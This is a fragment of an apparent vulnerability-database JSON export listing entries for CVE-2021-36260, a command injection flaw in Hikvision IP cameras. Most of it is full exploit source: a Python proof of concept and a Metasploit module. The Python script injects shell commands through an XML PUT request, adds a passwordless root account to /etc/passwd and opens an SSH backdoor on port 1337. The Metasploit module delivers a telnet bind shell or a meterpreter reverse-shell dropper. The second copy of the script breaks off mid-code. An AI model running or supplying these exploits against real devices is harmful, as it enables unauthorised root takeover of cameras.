"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-07-06T13:31:58", "id": "EC9F685E-B0E6-5337-BBE2-2A7926315702", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-03T01:50:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Hikvision Web Server Build 210702 - Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36933", "href": "https://0day.today/exploit/description/36933", "sourceData": "# Exploit Title: Hikvision Web Server Build 210702 - Command Injection\n# Exploit Author: bashis\n# Vendor Homepage: https://www.hikvision.com/\n# Version: 1.0\n# CVE: CVE-2021-36260\n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n\n# All credit to Watchful_IP\n\n#!/usr/bin/env python3\n\n\"\"\"\nNote:\n1) This code will _not_ 
verify if remote is Hikvision device or not.\n2) Most of my interest in this code has been concentrated on how to\n reliably detect vulnerable and/or exploitable devices.\n Some devices are easy to detect, verify and exploit the vulnerability,\n other devices may be vulnerable but not so easy to verify and exploit.\n I think the combined verification code should have very high accuracy.\n3) 'safe check' (--check) will try write and read for verification\n 'unsafe check' (--reboot) will try reboot the device for verification\n\n[Examples]\nSafe vulnerability/verify check:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check\n\nSafe and unsafe vulnerability/verify check:\n(will only use 'unsafe check' if not verified with 'safe check')\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot\n\nUnsafe vulnerability/verify check:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot\n\nLaunch and connect to SSH shell:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell\n\nExecute command:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\"\n\nExecute blind command:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\"\n\n$./CVE-2021-36260.py -h\n[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)\nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]\n [--reboot] [--shell] [--cmd CMD]\n [--cmd_blind CMD_BLIND] [--noverify]\n [--proto {http,https}]\n\noptional arguments:\n -h, --help show this help message and exit\n --rhost RHOST Remote Target Address (IP/FQDN)\n --rport RPORT Remote Target Port\n --check Check if vulnerable\n --reboot Reboot if vulnerable\n --shell Launch SSH shell\n --cmd CMD execute cmd (i.e: \"ls -l\")\n --cmd_blind CMD_BLIND\n execute blind cmd (i.e: \"reboot\")\n --noverify Do not verify if vulnerable\n --proto {http,https} Protocol used\n$\n\"\"\"\n\nimport os\nimport argparse\nimport time\n\nimport 
requests\nfrom requests import packages\nfrom requests.packages import urllib3\nfrom requests.packages.urllib3 import exceptions\n\n\nclass Http(object):\n def __init__(self, rhost, rport, proto, timeout=60):\n super(Http, self).__init__()\n\n self.rhost = rhost\n self.rport = rport\n self.proto = proto\n self.timeout = timeout\n\n self.remote = None\n self.uri = None\n\n \"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\"\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n self.remote = requests.Session()\n\n self._init_uri()\n\n self.remote.headers.update({\n 'Host': f'{self.rhost}:{self.rport}',\n 'Accept': '*/*',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',\n })\n \"\"\"\n self.remote.proxies.update({\n # 'http': 'http://127.0.0.1:8080',\n })\n \"\"\"\n\n def send(self, url=None, query_args=None, timeout=5):\n\n if query_args:\n \"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\"\n if len(query_args) > 22:\n print(f'[!] 
Error: Command \"{query_args}\" to long ({len(query_args)})')\n return None\n\n \"\"\"This weird code will try automatically switch between http/https\n and update Host\n \"\"\"\n try:\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n except requests.exceptions.ConnectionError:\n self.proto = 'https' if self.proto == 'http' else 'https'\n self._init_uri()\n try:\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n except requests.exceptions.ConnectionError:\n return None\n except requests.exceptions.RequestException:\n return None\n except KeyboardInterrupt:\n return None\n\n \"\"\"302 when requesting http on https enabled device\"\"\"\n\n if data.status_code == 302:\n redirect = data.headers.get('Location')\n self.uri = redirect[:redirect.rfind('/')]\n self._update_host()\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n\n return data\n\n def _update_host(self):\n if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:\n self.remote.headers.update({\n 'Host': self.uri[self.uri.rfind('://') + 3:],\n })\n\n def _init_uri(self):\n self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))\n\n def put(self, url, query_args, timeout):\n \"\"\"Command injection in the <language> tag\"\"\"\n query_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\\n f'<language>$({query_args})</language>'\n return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)\n\n def get(self, url, timeout):\n return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)\n\n\ndef check(remote, args):\n \"\"\"\n status_code == 200 (OK);\n Verified vulnerable and exploitable\n status_code == 500 (Internal Server 
Error);\n Device may be vulnerable, but most likely not\n The SDK webLanguage tag is there, but generate status_code 500 when language not found\n I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)\n (Issue: Could also be other directory than 'webLib', r/o FS etc...)\n status_code == 401 (Unauthorized);\n Defiantly not vulnerable\n \"\"\"\n if args.noverify:\n print(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"')\n return True\n\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\"')\n\n data = remote.send(url='/', query_args=None)\n if data is None:\n print(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"')\n return None\n print('[i] ETag:', data.headers.get('ETag'))\n\n data = remote.send(query_args='>webLib/c')\n if data is None or data.status_code == 404:\n print(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision')\n return False\n status_code = data.status_code\n\n data = remote.send(url='/c', query_args=None)\n if not data.status_code == 200:\n \"\"\"We could not verify command injection\"\"\"\n if status_code == 500:\n print(f'[-] Could not verify if vulnerable (Code: {status_code})')\n if args.reboot:\n return check_reboot(remote, args)\n else:\n print(f'[+] Remote is not vulnerable (Code: {status_code})')\n return False\n\n print('[!] Remote is verified exploitable')\n return True\n\n\ndef check_reboot(remote, args):\n \"\"\"\n We sending 'reboot', wait 2 sec, then checking with GET request.\n - if there is data returned, we can assume remote is not vulnerable.\n - If there is no connection or data returned, we can assume remote is vulnerable.\n \"\"\"\n if args.check:\n print('[i] Checking if vulnerable with \"reboot\"')\n else:\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"')\n remote.send(query_args='reboot')\n time.sleep(2)\n if not remote.send(url='/', query_args=None):\n print('[!] 
Remote is vulnerable')\n return True\n else:\n print('[+] Remote is not vulnerable')\n return False\n\n\ndef cmd(remote, args):\n if not check(remote, args):\n return False\n data = remote.send(query_args=f'{args.cmd}>webLib/x')\n if data is None:\n return False\n\n data = remote.send(url='/x', query_args=None)\n if data is None or not data.status_code == 200:\n print(f'[!] Error execute cmd \"{args.cmd}\"')\n return False\n print(data.text)\n return True\n\n\ndef cmd_blind(remote, args):\n \"\"\"\n Blind command injection\n \"\"\"\n if not check(remote, args):\n return False\n data = remote.send(query_args=f'{args.cmd_blind}')\n if data is None or not data.status_code == 500:\n print(f'[-] Error execute cmd \"{args.cmd_blind}\"')\n return False\n print(f'[i] Try execute blind cmd \"{args.cmd_blind}\"')\n return True\n\n\ndef shell(remote, args):\n if not check(remote, args):\n return False\n data = remote.send(url='/N', query_args=None)\n\n if data.status_code == 404:\n print(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!')\n data = remote.send(query_args='echo -n P::0:0:W>N')\n if data.status_code == 401:\n print(data.headers)\n print(data.text)\n return False\n remote.send(query_args='echo :/:/bin/sh>>N')\n remote.send(query_args='cat N>>/etc/passwd')\n remote.send(query_args='dropbear -R -B -p 1337')\n remote.send(query_args='cat N>webLib/N')\n else:\n print(f'[i] Remote \"{args.rhost}\" already pwned')\n\n print(f'[*] Trying SSH to {args.rhost} on port 1337')\n os.system(f'stty echo; stty iexten; stty icanon; \\\n ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\\n [email\u00a0protected]{args.rhost} -p 1337')\n\n\ndef main():\n print('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')\n parser.add_argument('--rport', required=False, type=int, 
default=80, help='Remote Target Port')\n parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')\n parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')\n parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')\n parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")')\n parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")')\n parser.add_argument(\n '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'\n )\n parser.add_argument(\n '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'\n )\n args = parser.parse_args()\n\n remote = Http(args.rhost, args.rport, args.proto)\n\n try:\n if args.shell:\n shell(remote, args)\n elif args.cmd:\n cmd(remote, args)\n elif args.cmd_blind:\n cmd_blind(remote, args)\n elif args.check:\n check(remote, args)\n elif args.reboot:\n check_reboot(remote, args)\n else:\n parser.parse_args(['-h'])\n except KeyboardInterrupt:\n return False\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36933", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T23:32:08", "description": "This Metasploit module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user. This module specifically attempts to exploit the blind variant of the attack. The module was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. 
It was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. Please see the Hikvision advisory for a full list of affected products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Hikvision IP Camera Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37431", "href": "https://0day.today/exploit/description/37431", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated command injection 
in a variety of Hikvision IP\n cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an\n HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution\n as the `root` user.\n\n This module specifically attempts to exploit the blind variant of the attack. The module\n was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It\n was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.\n Please see the Hikvision advisory for a full list of affected products.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Watchful_IP', # Vulnerability discovery and disclosure\n 'bashis', # Proof of concept\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-36260' ],\n [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],\n [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],\n [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']\n ],\n 'DisclosureDate' => '2021-09-18',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_ARMLE],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # the target has very limited payload targets and a tight payload space.\n # bind_busybox_telnetd might be *the only* one.\n 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',\n # saving four bytes of payload space by using 'sh' instead of '/bin/sh'\n 'LOGIN_CMD' => 'sh',\n 'Space' => 23\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_ARMLE],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf', 'echo' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 
'linux/armle/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Check will test two things:\n # 1. Is the endpoint a Hikvision camera?\n # 2. Does the endpoint respond as expected to exploitation? This module is\n # specifically testing for the blind variant of this attack so we key off\n # of the returned HTTP status code. The developer's test target responded\n # to exploitation with a 500. Notes from bashis' exploit indicates that\n # they saw targets respond with 200 as well, so we'll accept that also.\n def check\n # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:\n # <script>\n # window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime();\n # </script>\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/')\n })\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200\n return CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')\n\n payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)\n\n # Some cameras are not vulnerable and still respond 500. 
We can weed them out by making\n # the remote target sleep and use a low timeout. This might not be good for high latency targets\n # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all\n # 500 responses as vulnerable.\n payload = '<xml><language>$(sleep 20)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n }, 10)\n\n return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res\n\n CheckCode::Safe('The target did not execute the provided sleep command.')\n end\n\n def execute_command(cmd, _opts = {})\n # The injection space is very small. The entire snprintf is 0x1f bytes and the\n # format string is:\n #\n # /dav/%s.tar.gz\n #\n # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,\n # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for\n # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes\n # for payload. The 'echo' stager has a minium of 26 bytes but we obviously don't\n # have that much space. We can steal the extra space from the \"random\" file name\n # and compress ' >> ' to '>>'. That will get us below 23. 
Squeezing the extra\n # bytes will also allow printf stager to do more than 1 byte per exploitation.\n cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)\n cmd = cmd.gsub(/ >/, '>')\n cmd = cmd.gsub(/> /, '>')\n\n payload = \"<xml><language>$(#{cmd})</language></xml>\"\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n # generate a random value for the tmp file name. See execute_command for details\n @fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\"\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # 26 is technically a lie. See `execute_command` for additional insight\n execute_cmdstager(linemax: 26)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37431", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Hikvision Web Server Build 210702 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-36260"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164603", "href": "https://packetstormsecurity.com/files/164603/Hikvision-Web-Server-Build-210702-Command-Injection.html", "sourceData": "`# Exploit Title: Hikvision Web Server Build 210702 - Command Injection \n# Exploit Author: bashis \n# Vendor Homepage: https://www.hikvision.com/ \n# Version: 1.0 \n# CVE: CVE-2021-36260 \n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html \n \n# All credit to Watchful_IP \n \n#!/usr/bin/env python3 \n 
\n\"\"\" \nNote: \n1) This code will _not_ verify if remote is Hikvision device or not. \n2) Most of my interest in this code has been concentrated on how to \nreliably detect vulnerable and/or exploitable devices. \nSome devices are easy to detect, verify and exploit the vulnerability, \nother devices may be vulnerable but not so easy to verify and exploit. \nI think the combined verification code should have very high accuracy. \n3) 'safe check' (--check) will try write and read for verification \n'unsafe check' (--reboot) will try reboot the device for verification \n \n[Examples] \nSafe vulnerability/verify check: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check \n \nSafe and unsafe vulnerability/verify check: \n(will only use 'unsafe check' if not verified with 'safe check') \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot \n \nUnsafe vulnerability/verify check: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot \n \nLaunch and connect to SSH shell: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell \n \nExecute command: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\" \n \nExecute blind command: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\" \n \n$./CVE-2021-36260.py -h \n[*] Hikvision CVE-2021-36260 \n[*] PoC by bashis <mcw noemail eu> (2021) \nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] \n[--reboot] [--shell] [--cmd CMD] \n[--cmd_blind CMD_BLIND] [--noverify] \n[--proto {http,https}] \n \noptional arguments: \n-h, --help show this help message and exit \n--rhost RHOST Remote Target Address (IP/FQDN) \n--rport RPORT Remote Target Port \n--check Check if vulnerable \n--reboot Reboot if vulnerable \n--shell Launch SSH shell \n--cmd CMD execute cmd (i.e: \"ls -l\") \n--cmd_blind CMD_BLIND \nexecute blind cmd (i.e: \"reboot\") \n--noverify Do not verify if vulnerable \n--proto {http,https} Protocol used 
\n$ \n\"\"\" \n \nimport os \nimport argparse \nimport time \n \nimport requests \nfrom requests import packages \nfrom requests.packages import urllib3 \nfrom requests.packages.urllib3 import exceptions \n \n \nclass Http(object): \ndef __init__(self, rhost, rport, proto, timeout=60): \nsuper(Http, self).__init__() \n \nself.rhost = rhost \nself.rport = rport \nself.proto = proto \nself.timeout = timeout \n \nself.remote = None \nself.uri = None \n \n\"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\" \nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) \n \nself.remote = requests.Session() \n \nself._init_uri() \n \nself.remote.headers.update({ \n'Host': f'{self.rhost}:{self.rport}', \n'Accept': '*/*', \n'X-Requested-With': 'XMLHttpRequest', \n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', \n'Accept-Encoding': 'gzip, deflate', \n'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8', \n}) \n\"\"\" \nself.remote.proxies.update({ \n# 'http': 'http://127.0.0.1:8080', \n}) \n\"\"\" \n \ndef send(self, url=None, query_args=None, timeout=5): \n \nif query_args: \n\"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\" \nif len(query_args) > 22: \nprint(f'[!] 
Error: Command \"{query_args}\" to long ({len(query_args)})') \nreturn None \n \n\"\"\"This weird code will try automatically switch between http/https \nand update Host \n\"\"\" \ntry: \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \nexcept requests.exceptions.ConnectionError: \nself.proto = 'https' if self.proto == 'http' else 'https' \nself._init_uri() \ntry: \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \nexcept requests.exceptions.ConnectionError: \nreturn None \nexcept requests.exceptions.RequestException: \nreturn None \nexcept KeyboardInterrupt: \nreturn None \n \n\"\"\"302 when requesting http on https enabled device\"\"\" \n \nif data.status_code == 302: \nredirect = data.headers.get('Location') \nself.uri = redirect[:redirect.rfind('/')] \nself._update_host() \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \n \nreturn data \n \ndef _update_host(self): \nif not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]: \nself.remote.headers.update({ \n'Host': self.uri[self.uri.rfind('://') + 3:], \n}) \n \ndef _init_uri(self): \nself.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport)) \n \ndef put(self, url, query_args, timeout): \n\"\"\"Command injection in the <language> tag\"\"\" \nquery_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\ \nf'<language>$({query_args})</language>' \nreturn self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout) \n \ndef get(self, url, timeout): \nreturn self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout) \n \n \ndef check(remote, args): \n\"\"\" \nstatus_code == 200 (OK); \nVerified vulnerable and exploitable \nstatus_code == 500 
(Internal Server Error); \nDevice may be vulnerable, but most likely not \nThe SDK webLanguage tag is there, but generate status_code 500 when language not found \nI.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500) \n(Issue: Could also be other directory than 'webLib', r/o FS etc...) \nstatus_code == 401 (Unauthorized); \nDefiantly not vulnerable \n\"\"\" \nif args.noverify: \nprint(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"') \nreturn True \n \nprint(f'[*] Checking remote \"{args.rhost}:{args.rport}\"') \n \ndata = remote.send(url='/', query_args=None) \nif data is None: \nprint(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"') \nreturn None \nprint('[i] ETag:', data.headers.get('ETag')) \n \ndata = remote.send(query_args='>webLib/c') \nif data is None or data.status_code == 404: \nprint(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision') \nreturn False \nstatus_code = data.status_code \n \ndata = remote.send(url='/c', query_args=None) \nif not data.status_code == 200: \n\"\"\"We could not verify command injection\"\"\" \nif status_code == 500: \nprint(f'[-] Could not verify if vulnerable (Code: {status_code})') \nif args.reboot: \nreturn check_reboot(remote, args) \nelse: \nprint(f'[+] Remote is not vulnerable (Code: {status_code})') \nreturn False \n \nprint('[!] Remote is verified exploitable') \nreturn True \n \n \ndef check_reboot(remote, args): \n\"\"\" \nWe sending 'reboot', wait 2 sec, then checking with GET request. \n- if there is data returned, we can assume remote is not vulnerable. \n- If there is no connection or data returned, we can assume remote is vulnerable. \n\"\"\" \nif args.check: \nprint('[i] Checking if vulnerable with \"reboot\"') \nelse: \nprint(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"') \nremote.send(query_args='reboot') \ntime.sleep(2) \nif not remote.send(url='/', query_args=None): \nprint('[!] 
Remote is vulnerable') \nreturn True \nelse: \nprint('[+] Remote is not vulnerable') \nreturn False \n \n \ndef cmd(remote, args): \nif not check(remote, args): \nreturn False \ndata = remote.send(query_args=f'{args.cmd}>webLib/x') \nif data is None: \nreturn False \n \ndata = remote.send(url='/x', query_args=None) \nif data is None or not data.status_code == 200: \nprint(f'[!] Error execute cmd \"{args.cmd}\"') \nreturn False \nprint(data.text) \nreturn True \n \n \ndef cmd_blind(remote, args): \n\"\"\" \nBlind command injection \n\"\"\" \nif not check(remote, args): \nreturn False \ndata = remote.send(query_args=f'{args.cmd_blind}') \nif data is None or not data.status_code == 500: \nprint(f'[-] Error execute cmd \"{args.cmd_blind}\"') \nreturn False \nprint(f'[i] Try execute blind cmd \"{args.cmd_blind}\"') \nreturn True \n \n \ndef shell(remote, args): \nif not check(remote, args): \nreturn False \ndata = remote.send(url='/N', query_args=None) \n \nif data.status_code == 404: \nprint(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!') \ndata = remote.send(query_args='echo -n P::0:0:W>N') \nif data.status_code == 401: \nprint(data.headers) \nprint(data.text) \nreturn False \nremote.send(query_args='echo :/:/bin/sh>>N') \nremote.send(query_args='cat N>>/etc/passwd') \nremote.send(query_args='dropbear -R -B -p 1337') \nremote.send(query_args='cat N>webLib/N') \nelse: \nprint(f'[i] Remote \"{args.rhost}\" already pwned') \n \nprint(f'[*] Trying SSH to {args.rhost} on port 1337') \nos.system(f'stty echo; stty iexten; stty icanon; \\ \nssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\ \nP@{args.rhost} -p 1337') \n \n \ndef main(): \nprint('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)') \n \nparser = argparse.ArgumentParser() \nparser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)') \nparser.add_argument('--rport', required=False, type=int, 
